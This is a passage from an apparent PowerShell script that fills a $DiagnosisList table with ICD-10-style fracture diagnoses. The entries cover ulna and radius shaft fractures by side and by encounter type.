= $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, left arm","Nondisplaced segmental fracture of shaft of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, unspecified arm","Nondisplaced segmental fracture of shaft of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of right ulna","Monteggia's fracture of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of left ulna","Monteggia's fracture of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Monteggia's fracture of unspecified ulna","Monteggia's fracture of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right ulna","Bent bone of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left ulna","Bent bone of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified ulna","Bent bone of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right ulna","Other fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left ulna","Other fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified ulna","Other fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft 